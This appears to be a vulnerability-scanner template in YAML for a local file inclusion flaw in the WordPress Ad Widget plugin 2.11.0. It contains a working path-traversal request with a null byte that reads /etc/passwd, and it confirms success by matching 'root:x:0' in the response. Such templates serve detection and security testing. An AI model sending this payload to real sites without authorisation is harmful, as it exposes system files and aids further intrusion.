product: WordPress
vName: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0)
type: 文件读取
vID: [ ]
level: 3
vDesc: Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
version: ''
note: ''
search: { }
protocol: http
link: https://cxsecurity.com/issue/WLB-2017100084
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00
    verify:
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and
        - status: 200
